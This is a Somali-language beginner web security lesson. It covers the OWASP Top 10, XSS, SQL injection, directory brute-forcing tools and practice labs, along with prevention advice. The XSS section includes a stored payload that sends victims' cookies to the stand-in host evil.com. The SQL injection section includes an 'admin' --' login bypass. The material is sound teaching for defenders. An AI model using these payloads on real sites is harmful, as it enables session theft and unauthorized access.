Casharka Ugu Dambeeya — Web Security!

Casharkaan wuxuu xididayaa koorsada oo dhan. Waxaad baranaysaa sida loo aqoonsado nuglaanshaha website-ka: XSS, SQL Injection, iyo Directory Discovery — meelaha ugu badan ee hackers-ka ay soo gelaan.

📌 Waxaad baranaysaa: OWASP Top 10, XSS (Cross-Site Scripting), SQL Injection hordhac, directory discovery (Gobuster/Dirb), iyo sida website-ka loo ammaan geliyo.

⚖️ Ogeysiis Muhiim ah: Ku isticmaal aqoontaan si ansax ah — nidaamahaaga ama beerooyinka tijaabada ah (DVWA, HackTheBox, TryHackMe). Wixii ku saabsan website-yada kale, u baahan tahay fasax.

1. OWASP Top 10 — Nuglaanshaha Ugu Badan

OWASP (Open Web Application Security Project) waa hay'ad aan faa'iido doon ahayn oo daabacda liiska nuglaanshaha website-yada ugu badan. Liiska 2021-ka:

  1. A01: Broken Access Control — Isticmaaluhu wuu geli karaa meelaha aan loo ogolayn
  2. A02: Cryptographic Failures — Xogta la siriyay si khaldan ama aan la siriyayn
  3. A03: Injection (SQL, NoSQL, etc.) — Input-ka isticmaalaha ayaa loo xukuma nidaamka
  4. A04: Insecure Design — Naqshadaynta nidaamka oo khaldan
  5. A05: Security Misconfiguration — Qaabeynta nidaamka oo khaldan
  6. A06: Vulnerable Components — Libraries / frameworks hore oo nugul
  7. A07: Auth Failures — Galitaanka nidaamka oo loogu joogsaday si khaldan
  8. A08: Software & Data Integrity — Updates ma la xaqiijin karo?
  9. A09: Logging Failures — Diiwaanka aan la kaydin si fiican
  10. A10: Server-Side Request Forgery (SSRF) — Server-ka ayaa weerar lagu isticmaalaa

2. XSS — Cross-Site Scripting

XSS waa nuglaansha ugu badan ee websites-ka. Waxay dhacda marka website-ku oggolaado in koodh xun (JavaScript) lagu daboolo page-ka oo la socodsiiyo browser-ka isticmaaluhu.

Noocyada XSS

# 1. Reflected XSS — koodhka waxaa loogu celinaa marka la baadho
# URL: http://vulnerable.com/search?q=<script>alert('XSS')</script>
# Hadduu website-ka direct-ka ku daabaco, wuu socodsiin doonaa

# 2. Stored XSS — koodhka waxaa la kaydiyaa database-ka
# Tusaale: Comment field oo lagu geliyo:
# <script>document.location='http://evil.com/steal?cookie='+document.cookie</script>
# Hadda isticmaalaha kasta ee aragtaa comment-ka, cookie-gaagii wuu leexsan doonaa

# 3. DOM-based XSS — JavaScript-ka browser-ka ayaa bedelaya DOM-ka

Sidee loo Xaqiijin karaa XSS

# Tijaabi input fields-ka website-ka
# Ku geli:
<script>alert('XSS Test')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Hadduu saas u shaqeeyo — website-ku waa nugul yahay XSS

Sida XSS loo xukumo (Prevention)

# 1. HTML Encoding — bedel xarfaha khaas
# < → &lt;   > → &gt;   " → &quot;

# 2. Content Security Policy (CSP) Header
Content-Security-Policy: default-src 'self'; script-src 'self'

# 3. HTTPOnly Cookie — ka hortag in JavaScript cookie-ga galo
Set-Cookie: session=abc123; HttpOnly; Secure

# 4. Framework-ka isticmaal (React, Angular) — waxay si toos ah u xukumaan

3. SQL Injection — Hordhac

SQL Injection waxay dhacda marka input-ka isticmaalaha si toos ah loogu daray SQL query-da la qoraysan la'aanteed. Tani waxay oggolaanaysaa in hacker-ku jagadeeyo query-da.

Tusaale SQL Injection

# Website-ka code-kiisa oo nugul (Python / PHP)
# query = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"

# Isticmaaluhu hadduu galiyo:
# Username: admin' --
# Password: wax kasta

# Query-da noqonaysaa:
# SELECT * FROM users WHERE username='admin' -- ' AND password='wax kasta'
# Sababtoo ah -- waa comment SQL-ka dhexdiisa, password-kii waa la ilowday!

# Hacker-ku wuxuu galayaa adoo aan password garanayno

Sida SQL Injection loo xukumo

# 1. Parameterized Queries (Ugu muhiim)
# Python (sqlite3):
cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password))

# PHP (PDO):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username=:username");
$stmt->execute(['username' => $username]);

# 2. Input Validation
# Ku xidh nooca iyo dhererka

# 3. ORM isticmaal
# SQLAlchemy, Django ORM, iwm — waxay si toos ah u xukumaan

4. Directory Discovery — Hel Meelaha Qarsoon

Directory Discovery waa hab lagu raadinayo directories iyo files qarsoon ee website-ka ee aan si cad loo muujeynin. Xirfadlayaasha pen testing-ka badanaa waxay helaan admin pages, backup files, iyo config files si hawl ah.

Gobuster — Tool-ka Ugu Dhakhsaha badan

# Ku rakib
sudo apt install gobuster

# Basic Directory Discovery
gobuster dir -u http://localhost -w /usr/share/wordlists/dirb/common.txt

# Dheeraad ah
gobuster dir \
  -u http://target.com \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,txt,bak \
  -t 50 \
  -o natiijo.txt

# Sharaxaad flags-ka:
# -u  = URL bartilmaameedka
# -w  = Wordlist (liiska kelmadaha lagu tijaabinayo)
# -x  = Fileypes (extensions) la raadinayo
# -t  = Threads (meli samaynta)
# -o  = Natiijada keydi faylka

Dirb — Alternativ-ka Fudud

# Dirb — fudud laakiin wuu shaqeeyaa
dirb http://localhost
dirb http://localhost /usr/share/dirb/wordlists/common.txt

Feroxbuster — Recursive Scan

# Feroxbuster wuu gali karaa galayaasha hoostooda sidoo kale
feroxbuster --url http://localhost --wordlist /usr/share/wordlists/dirb/common.txt

5. Beerooyinka Tijaabada ah (Practice Labs)

Ku tijaabi aqoontaada adigoo isticmaalaya beerooyinka ansaxa ah:

Bilaash ah — Online

  • 🟢 TryHackMe (tryhackme.com) — Bilow-friendly, waxaa laga heli karaa rooms bilaash ah
  • 🔵 HackTheBox (hackthebox.com) — Heer sare, laakiin fursado badan
  • 🟡 PortSwigger Web Security Academy — Web Security oo bilaash ah si gaar ah
  • 🟠 PicoCTF — Xirfadlayaasha billowayaasha ah

Locally (VMs)

  • 💻 DVWA (Damn Vulnerable Web Application) — Website nugul oo loogu talagalay barasho
  • 💻 VulnHub — VMs bilaash ah oo la baari karo
  • 💻 Metasploitable — Linux VM oo nugul, Metasploit lagu tijaabinayo
# Dejis DVWA Docker-ka
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# Browser-ka fur: http://localhost
# Username: admin
# Password: password

6. Web Security Checklist — Hubi Website-kaaga

# Qaabeynta Aasaasiga (HTTP Headers)
curl -I https://example.com

# Hubi headers muhiimka:
# X-Frame-Options: DENY / SAMEORIGIN    (Clickjacking xukun)
# X-XSS-Protection: 1; mode=block      (XSS filter)
# Content-Security-Policy              (CSP)
# Strict-Transport-Security            (HSTS)
# X-Content-Type-Options: nosniff      (MIME sniffing)

# Online tools si bilaash ah:
# securityheaders.com    — Header check
# ssllabs.com/ssltest    — SSL/TLS check
# observatory.mozilla.org — Security check

🎓 Koorsada Cybersecurity Oo Dhan Waa La Dhammaystay!

Waxaad baratay: Ethical Hacking, Networking, Linux, OSINT, Nmap, iyo Web Security. Hadda waxaad leedahay aasas adag oo cybersecurity ah. Sii wad, ku celso tijaabada, iyo raad shaqo ama bug bounty!

🎓 Dhamaan Koorsooyinka →

🚀 Tallaabada Xiga: Bilow TryHackMe ama HackTheBox, qaado exam-ka eJPT ama CompTIA Security+, oo raadi shaqo cybersecurity ah. Fadal Store ayaa sii daraynaysa casharo dheeraad ah — raadi warkooda!

← Casharka 5aad 💻 Koorso Programming →